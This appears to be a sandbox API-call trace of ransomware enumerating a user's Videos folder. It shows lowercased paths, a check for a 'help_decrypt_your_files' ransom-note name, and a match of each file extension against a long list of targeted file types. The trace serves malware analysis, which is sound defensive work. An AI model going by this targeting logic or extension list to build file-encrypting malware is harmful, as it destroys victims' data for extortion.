	[0202.157] StrStrW (lpFirst=".avi", lpSrch=".") returned=".avi"
	[0202.157] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.157] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".avi") returned 0x0
	[0202.157] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fc6bae0, ftCreationTime.dwHighDateTime=0x1d96e83, ftLastAccessTime.dwLowDateTime=0xa07ed5e0, ftLastAccessTime.dwHighDateTime=0x1d970a2, ftLastWriteTime.dwLowDateTime=0xa07ed5e0, ftLastWriteTime.dwHighDateTime=0x1d970a2, nFileSizeHigh=0x0, nFileSizeLow=0x1333, dwReserved0=0x0, dwReserved1=0x0, cFileName="b5 8Le_NSyMJbdwICV.mp4", cAlternateFileName="B58LE_~1.MP4")) returned 1
	[0202.157] lstrcmpW (lpString1="b5 8Le_NSyMJbdwICV.mp4", lpString2="..") returned 1
	[0202.158] lstrcmpW (lpString1="b5 8Le_NSyMJbdwICV.mp4", lpString2=".") returned 1
	[0202.158] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\"
	[0202.158] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\", lpString2="b5 8Le_NSyMJbdwICV.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\b5 8Le_NSyMJbdwICV.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\b5 8Le_NSyMJbdwICV.mp4"
	[0202.158] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\b5 8Le_NSyMJbdwICV.mp4") returned 85
	[0202.158] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0202.158] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\b5 8Le_NSyMJbdwICV.mp4", cchLength=0x55 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4") returned 0x55
	[0202.158] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.158] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4", lpSrch="help_decrypt_your_files") returned 0x0
	[0202.158] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4"
	[0202.159] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4") returned 85
	[0202.159] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.159] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.159] StrStrW (lpFirst=".mp4", lpSrch=".") returned=".mp4"
	[0202.159] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.160] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp4") returned=".mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
